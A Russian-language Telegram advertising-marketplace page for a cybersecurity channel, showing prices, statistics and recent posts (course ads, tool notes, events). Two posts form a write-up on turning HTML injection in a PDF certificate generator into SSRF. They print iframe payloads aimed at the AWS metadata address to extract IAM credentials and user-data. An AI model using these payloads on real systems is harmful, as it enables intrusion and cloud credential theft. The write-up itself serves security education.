
⚡️ Заказывайте в AI-каталоге — получайте скидку!
5% скидка на размещения в каналах, которые подобрал AI. Промокод: TELEGA-AI
Подробнее

РегистрацияВойтиВойти
Скидка 3,5% на первые три заказа
Получите скидку на первые три заказа!
Зарегистрируйтесь и получите скидку 3,5% на первые рекламные кампании — промокод активен 7 дней.
48.3

ZeroDay | Кибербезопасность
4.9
30
Интернет технологии
1.0K
17
Учебник по информационной безопасности/кибербезопасности.
Новый свежезалитый канал со взрослой аудиторией
Поделиться
В избранное
Купить рекламу в этом канале
Формат:
keyboard_arrow_down
- 1/24
- 2/48
- 3/72
- Нативный
- 7 дней
- Репост
1 час в топе / 24 часа в ленте
Количество:
%keyboard_arrow_down
- 1
- 2
- 3
- 4
- 5
- 8
- 10
- 15
Стоимость публикации:
local_activity
15 384.60₽15 384.60₽local_mall
0.0%
Осталось по этой цене:0
Последние посты канала
imageИзображение не доступно для предпросмотра
Как защитить LLM от взлома? Студкемп Яндекс Образования на базе УрФУ по кибербезопасности
💻💻💻💻💻💻
Узнаете безопасную архитектуру LLM и как управлять рисками этических атак на ИИ. Вас ждут лекции по информационной безопасности от экспертов и практика: разработка защищенного LLM, хакатон. Этот студкемп — возможность войти в профессию кибербезопасности!
Если знаете Python и NLP-задачи, понимаете устройство Docker и основы HTTP/HTTPS, Websockets — вы знаете, что делать. Победителям отбора Яндекс Образование оплатит дорогу и проживание на время студкемпа.
Зарегистрироваться можно по ссылке.
3520
16:00
18.07.2025
imageИзображение не доступно для предпросмотра
Как я устал тестировать LLM вручную, и сделал универсальный сканер уязвимостей
Когда ты в сотый раз копипастишь один и тот же prompt в чат-бота, приходит озарение: «А зачем вообще это делает человек, если у нас есть ИИ?» Так родился сканер для LLM: тестирует на уязвимости, как будто это веб-приложение, только вместо SQL-инъекций prompt injection.
⏺В статье рассказывается, как обычный корпоративный бот на RAG вдруг начал сливать конфиденциалку, как выглядят настоящие атаки на LLM, и как я автоматизировал проверку на prompt injection, data leakage и context abuse.
ZeroDay | #Статья
4029
13:00
21.07.2025
imageИзображение не доступно для предпросмотра
А вы знали что...
🔸85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024)
🔸Каждое 3-е приложение в Google Play имеет уязвимости, связанные с хранением данных (исследование Positive Technologies).
🔸Хакерские атаки на Android выросли на 50% за последние 2 года (данные Kaspersky Lab).
Знание этих рисков – первый шаг к безопасности. Второй – освоить инструменты, которые помогут их устранить. Стартуем 31 июля! 👩💻
🔴Записаться
Рассмотрим устройство приложений под ОС Android, этапы создания мобильного приложения, приемы реверса и изменения кода. Подробно изучим поиск и эксплуатацию уязвимостей.
Курс создан для:
🌟 Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений
🚀 По всем вопросам пишите @Codeby_Academy
3442
15:49
22.07.2025
play_circleВидео недоступно для предпросмотра
Deluder: перехват трафика там, где прокси бессильны
👋
Приветствую в мире цифровой безопасности!
Поговорим о еще одном инструменте безопасности.
⏺Что это: Deluder - это инструмент для перехвата трафика у приложений, которые не умеют работать с прокси. Да, таких много. Использует Frida и динамическую инструментацию, чтобы внедриться в сетевые библиотеки прямо в реальном времени. Поддерживает WinSock, OpenSSL, GnuTLS, SChannel и даже обычные Linux sockets.
⏺Почему это удобно: Потому что вам не надо ничего патчить. Просто цепляемся к процессу - и начинаем наблюдать трафик даже у десктопных GUI-программ, которые вообще не подозревают о MITM. Отлично дружит с PETEP, но можно использовать и отдельно.
ZeroDay | #Инструмент2895
10:00
23.07.2025
imageИзображение не доступно для предпросмотра
Настоящие, синтетические или замаскированные? Как работать с ПДн без риска нарушить закон
Вебинар группы компаний «Гарда»
📆 31 июля в 11:00
Как операторам ПДн работать с персональными данными клиентов легально и безопасно? Об этом и поговорим на вебинаре.
Вы узнаете:
✔️Какие бывают утечки: поговорим о технических, организационных, целенаправленных и случайных утечках
✔️Почему B2B страдает не меньше, чем B2C
✔️Что сказано в законе по поводу тестирования на реальных данных
✔️Где граница между персональными и «уже не персональными» данными
✔️Что лучше — настоящие, синтетические или замаскированные данные
✔️Как работает «Гарда Маскирование»: алгоритмы поиска, маскировки и удаления персональных данных
❗Гость эфира — Ирина Левова, директор по стратегическим проектам Ассоциации больших данных.
🟣 Регистрируйтесь!
#реклама
О рекламодателе
2834
13:00
23.07.2025
imageИзображение не доступно для предпросмотра
Как превратить простую HTML-инъекцию в SSRF с помощью рендеринга PDF
👋
Приветствую в мире цифровой безопасности!
Сегодня покажу, как простая HTML-инъекция в генераторе сертификатов привела к с SSRF с утечкой AWS-доступа.
⏺С чего всё началось: Тестируя сайт онлайн-курсов, я почти ушёл ни с чем. Но потом наткнулся на сертификат, который генерируется сервером в PDF или PNG после завершения курса. Можно было ввести name, title и quote.
⏺Первые находки: В параметре title HTML не фильтровался.
➡️"<i>ahmed</i>"
— текст стал курсивом.
➡️"<iframe src='https://sub.0xxnum.fun/test'></iframe>"
— сработало.
А вот script, onerror и XSS не сработали. Это была HTML-инъекция, но рендер происходил на бэке.
⏺Что это дало: PDF-генерация происходила через headless-браузер. Это означало, что я могу встроить <iframe> с URL, и сервер сам сделает запрос. Привет, SSRF.
⏺Дальше еще интереснее: Я начал направлять iframe на локальные ресурсы (http://127.0.0.1:3000, 169.254.169.254
) — и получил неожиданный ответ в PDF. Так, постепенно я добрался до метаданных AWS EC2-инстанса и вытянул access tokens.
⏺Что сработало:
"title": "<iframe src='http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name'></iframe>"{}
Делаем вторую часть?
ZeroDay | #атака2847
16:00
23.07.2025
imageИзображение не доступно для предпросмотра
CyberSec Meetup от Ozon Tech Community пройдёт 29 июля.
Коллеги предлагают на один вечер забыть об атаках и логах и переключить внимание на другие важные процессы в ИБ.
Что в программе:
- аудит информационной безопасности — подходы, польза и утки;
- взгляд ИБ на тестирование LLM;
- внедрение DAST в Ozon — от опенсорса до самописного решения;
- метрики работы первой линии SOC и задачи координатора инцидентов;
- опыт обучения сотрудников безопасной разработке.
Тех, кто в Москве, приглашают в Центральный университет. Онлайн тоже можно присоединиться. Регистрироваться — в любом случае.
Мы будем. С вас лайк, если тоже собираетесь.
2174
14:13
24.07.2025
imageИзображение не доступно для предпросмотра
Как превратить простую HTML-инъекцию в SSRF с помощью рендеринга PDF. Ч.2
👋
Приветствую в мире цифровой безопасности!
Сегодня продолжу говорить про то, как простая HTML-инъекция в генераторе сертификатов привела к с SSRF с утечкой AWS-доступа.
⏺Подтверждаем SSRF: После того как <iframe> с внешним URL сработал, я захотел понять — а сервер точно сам ходит по этим ссылкам? Для этого сделал редирект на свой контролируемый домен:
"title": "<iframe src='http://sub.tarek.dev/probe'></iframe>"{}
И, как только PDF был сгенерирован, я получил DNS и HTTP-запрос на свой listener. Это подтвердило: HTML рендерится браузероподобным инструментом, и сервер действительно загружает внешние ресурсы.
⏺Выход на метаданные AWS: SSRF был налицо, и я перешёл к следующей цели - 169.254.169.254
— стандартному адресу метаданных AWS-инстансов.
"title": "<iframe src='http://169.254.169.254/latest/meta-data/'></iframe>"{}
PDF вернулся с содержимым страницы метаданных. Я пошёл дальше - запрашиваю IAM credentials:
"title": "<iframe src='http://169.254.169.254/latest/meta-data/iam/security-credentials/'></iframe>"{}
Вижу имя роли, например, my-app-instance-role.
⏺Финальный удар - доступ к AWS: Теперь знаю имя роли, и нацеливаюсь точнее:
"title": "<iframe src='http://169.254.169.254/latest/meta-data/iam/security-credentials/my-app-instance-role'></iframe>"{}
В PDF прилетели:
• AccessKeyId
• SecretAccessKey
• Token
Эти временные креды можно было использовать для доступа к S3, DynamoDB, CloudWatch и другим сервисам AWS, в зависимости от привилегий роли.
⏺И насчет user-data: А вдруг dev-опсы оставили что-то интересное в скриптах и переменных окружения?
"title": "<iframe src='http://169.254.169.254/latest/user-data'></iframe>"{}
Иногда там лежат secrets, API-токены, начальные скрипты с логикой деплоя.
ZeroDay | #атака1462
17:13
24.07.2025
close
Спецпредложения
3 Канала информационной безопасности

Каналов
3
95.6K
lock_outline
CPV
lock_outline53 846.10 ₽₽
40 384.58 ₽₽
-25%
С этим каналом часто покупают
Отзывы канала
keyboard_arrow_down
- Добавлен: Сначала новые
- Добавлен: Сначала старые
- Оценка: По убыванию
- Оценка: По возрастанию
4.9
2 отзыва за 6 мес.
Превосходно (100%) За последние 6 мес
r
**klama@*****.ru
на сервисе с декабря 2024
30.04.202515:37
5
Оперативное размещение
Показать еще
Лучшие в тематике
Новинки в тематике
Статистика канала
Рейтинг
48.3
Оценка отзывов
4.9
Выполнено заявок
82
Подписчики:
42.4K
Просмотры на пост:
lock_outline
ER:
6.8%
Публикаций в день:
2.0
CPV
lock_outlineВыбрано
0
каналов на сумму:0.00₽
Подписчики:
0
Просмотры:
lock_outline
Перейти в корзинуКупить за:0.00₽
Комментарий